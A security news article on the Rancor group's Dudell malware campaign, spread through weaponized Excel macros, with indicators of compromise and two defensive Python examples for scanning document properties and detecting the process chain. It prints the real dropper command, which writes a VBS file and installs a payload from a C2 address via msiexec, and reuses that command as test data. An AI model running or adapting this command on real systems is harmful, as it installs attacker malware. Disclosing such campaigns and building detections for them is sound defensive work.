Thursday, May 1, 2025
Unknown Hacking Group Launching Custom Malware “Dudell” via Weaponized Microsoft Excel Documents

Researchers discovered a new wave of a custom-malware campaign, named “Dudell”, from a previously unknown cyberespionage group dubbed Rancor.

The Rancor threat group has been active since 2017 and continuously targeted government organizations until January 2019; in the current campaign, researchers discovered an undocumented custom malware.

Additionally, the group uses another malware family called “Derusbi” to load a secondary payload once it infiltrates a target; the malware is installed on the victim’s machine over two rounds of attack.

Researchers observed the attacker using 149.28.156[.]61 to deliver either Derusbi or KHRat samples, with either cswksfwq.kfesv[.]xyz or connect.bafunpda[.]xyz as the C2.

Rancor has a record of conducting targeted attacks in Southeast Asia throughout 2017 and 2018.

DUDELL Malware Infection Process

The DUDELL malware was initially observed in a weaponized Microsoft Excel document delivered as a malspam email attachment.

Once the victim opens the attachment and clicks “Enable Content”, a malicious macro is triggered and runs on the victim’s machine.

During this process, the macro reads the following data from the Company field in the document’s properties and executes it:

cmd /c set /p=Set v=CreateObject(^"Wscript.Shell^"):v.Run ^"msiexec /q /i http://199.247.6[.]253/ud^",false,0 <nul > C:\Windows\System32\spool\drivers\color\tmp.vbs

The C2 server IP is visible in this data; the resulting script downloads the second-stage payload via the Microsoft tool msiexec.
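Because the payload lives in a document property rather than in the VBA itself, a defender can triage a suspicious workbook without opening it in Office: the Company field is stored as plain XML in docProps/app.xml inside the OOXML zip. The following Python is an added example, not code from this article or from the Palo Alto Networks report. It builds a constructed workbook-like zip that carries the command shown above in its Company field, extracts the extended properties, and flags patterns (cmd /c, set /p=, WScript.Shell, msiexec installing from a URL, .vbs references); the pattern list and the helper names are assumptions chosen for this illustration.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Standard namespace of the OOXML extended-properties part (docProps/app.xml),
# which holds fields such as Application and Company.
EXT_PROPS_NS = "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties"

# The command the article shows in the Company field (IP kept defanged as on the page).
SAMPLE_COMMAND = (
    r'cmd /c set /p=Set v=CreateObject(^"Wscript.Shell^"):v.Run ^"msiexec /q /i '
    r'http://199.247.6[.]253/ud^",false,0 <nul > '
    r'C:\Windows\System32\spool\drivers\color\tmp.vbs'
)

# Indicators a defender would flag inside a document property.
# Assumption: this list is illustrative, not exhaustive.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\bcmd(?:\.exe)?\s+/c\b", re.I), "cmd /c launcher"),
    (re.compile(r"\bset\s+/p=", re.I), "set /p used to write a file"),
    (re.compile(r'CreateObject\(\s*\^?"?Wscript\.Shell', re.I), "WScript.Shell object"),
    (re.compile(r"\bmsiexec\b.*?/i\s+https?://", re.I), "msiexec installing from a URL"),
    (re.compile(r"\.vbs\b", re.I), "VBScript file reference"),
]


def read_extended_properties(doc_bytes):
    """Return {field: text} for docProps/app.xml of an OOXML file (xlsx/docx/pptx)."""
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as zf:
        if "docProps/app.xml" not in zf.namelist():
            return {}
        root = ET.fromstring(zf.read("docProps/app.xml"))
    props = {}
    for child in root:
        tag = child.tag.split("}", 1)[-1]  # strip the namespace: "{ns}Company" -> "Company"
        props[tag] = child.text or ""
    return props


def flag_property(value):
    """Return the labels of every suspicious pattern found in one property value."""
    return [label for pattern, label in SUSPICIOUS_PATTERNS if pattern.search(value)]


def scan_document(doc_bytes):
    """Return {property_name: [labels]} for each property that looks like a command."""
    findings = {}
    for name, value in read_extended_properties(doc_bytes).items():
        hits = flag_property(value)
        if hits:
            findings[name] = hits
    return findings


def build_sample_xlsx(company_value):
    """Build a minimal OOXML-like zip (constructed test data, not a real workbook)."""
    app_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Properties xmlns="{EXT_PROPS_NS}">'
        "<Application>Microsoft Excel</Application>"
        f"<Company>{escape(company_value)}</Company>"  # escape <, > and & for XML
        "</Properties>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("docProps/app.xml", app_xml)
    return buf.getvalue()


if __name__ == "__main__":
    for label, sample in [("benign", "Acme Corp"), ("weaponized", SAMPLE_COMMAND)]:
        print(label, scan_document(build_sample_xlsx(sample)))
```

The same check is worth running over docProps/core.xml (title, subject, description, keywords), since any property a macro can read through the Office object model can carry a command in the same way.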

Researchers from Palo Alto Networks said, “we discovered a similar VBS script used by the Rancor actors that might give us some clues on what the contents of tmp.vbs would resemble. File office.vbs”

An export function named DllInstall was observed in this campaign; it is responsible for the core behavior of the malware.

Once executed, the malware creates a hidden window, which appears to be an attempt to evade sandbox analysis. It then sends victim information such as the hostname, IP address and language pack, along with other operating system information.

Malware also has the following capabilities:

  • Terminate a specific process
  • Enumerate processes
  • Upload file
  • Download file
  • Delete file
  • List folder contents
  • Enumerate storage volumes
  • Execute a command
  • Reverse shell
  • Take a screenshot

Researchers also observed a VB script named Chrome.vbs associated with the Rancor group. The VBScript is obfuscated and contains packed data that is used to infect a target with multiple chained persistent artifacts.
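The chain described above (Excel launching cmd.exe, cmd writing tmp.vbs under spool\drivers\color, msiexec fetching a package from a URL, and further VBScript stages) leaves a recognisable trail in process-creation telemetry. The Python below is an added example, not code from this article or from the Rancor reports. It runs a few simple rules over constructed Sysmon-style records with the fields ParentImage, Image and CommandLine; the rule names, the sample events and the assumption that wscript.exe is the parent of msiexec in the second stage are mine for this illustration.

```python
import ntpath
import re

# Office hosts and the living-off-the-land binaries they should rarely spawn.
# Assumption: these sets are illustrative, tune them to your environment.
OFFICE_HOSTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
LOLBINS = {"cmd.exe", "wscript.exe", "cscript.exe", "msiexec.exe", "powershell.exe", "mshta.exe"}

# cmd.exe using "set /p=... > file.ext" to write a script to disk
SET_P_WRITE = re.compile(r"\bset\s+/p=.*>\s*\S+\.(?:vbs|js|bat|cmd|ps1)\b", re.I)
# msiexec installing a package straight from a URL
MSIEXEC_URL = re.compile(r"/i\s+[\"']?https?://", re.I)
# a script or binary referenced under the writable colour-profile directory the article names
SPOOL_COLOR_SCRIPT = re.compile(r"spool\\drivers\\color\\\S+\.(?:vbs|js|bat|cmd|dll|exe)\b", re.I)

# Constructed process-creation events (not real telemetry). The URL is kept defanged
# exactly as the article prints it.
SAMPLE_EVENTS = [
    {
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'cmd /c set /p=Set v=CreateObject(^"Wscript.Shell^"):v.Run ^"msiexec /q /i '
                       r'http://199.247.6[.]253/ud^",false,0 <nul > '
                       r'C:\Windows\System32\spool\drivers\color\tmp.vbs',
    },
    {   # assumption: the VBS stage is run by wscript.exe, which then starts msiexec
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r"msiexec /q /i http://199.247.6[.]253/ud",
    },
    {   # benign: the Windows Installer service starting msiexec for a local package
        "ParentImage": r"C:\Windows\System32\services.exe",
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r"C:\Windows\system32\msiexec.exe /V",
    },
    {   # benign: a user opening a workbook from Explorer
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" C:\Users\u\budget.xlsx',
    },
]


def evaluate(event):
    """Return the names of every rule one process-creation event triggers."""
    parent = ntpath.basename(event["ParentImage"]).lower()
    image = ntpath.basename(event["Image"]).lower()
    cmdline = event["CommandLine"]
    hits = []
    if parent in OFFICE_HOSTS and image in LOLBINS:
        hits.append("office_spawns_lolbin")
    if image == "cmd.exe" and SET_P_WRITE.search(cmdline):
        hits.append("cmd_set_p_script_write")
    if image == "msiexec.exe" and MSIEXEC_URL.search(cmdline):
        hits.append("msiexec_remote_install")
    if SPOOL_COLOR_SCRIPT.search(cmdline):
        hits.append("script_in_spool_color")
    return hits


def hunt(events):
    """Return [(index, [rule names])] for the events that triggered at least one rule."""
    return [(i, evaluate(e)) for i, e in enumerate(events) if evaluate(e)]


if __name__ == "__main__":
    for index, rules in hunt(SAMPLE_EVENTS):
        print(index, ntpath.basename(SAMPLE_EVENTS[index]["Image"]), rules)
```

Each rule on its own is noisy in some environments (administrators do run msiexec against URLs), so the value is in correlation: an Office parent, a script written by set /p and a remote msiexec install within a few seconds on one host is a far stronger signal than any one of them.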

Indicators of Compromise

SHA256:

0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707
AAEBF987B8D80D71313C3C0F2C16D60874FFECBDDA3BB6B44D6CBA6D38031609
0D61D9BAAB9927BB484F3E60384FDB6A3709CA74BC6175AB16B220A68F2B349E
DB982B256843D8B6429AF24F766636BB0BF781B471922902D8DCF08D0C58511E
CC081FFEA6F4769733AF9D0BAE0308CA0AE63667FA225E7965DF0884E96E2D2A
BC1C3E754BE9F2175B718ABA62174A550CDC3D98AB9C36671A58073140381659
83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2abd9e0d

Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.
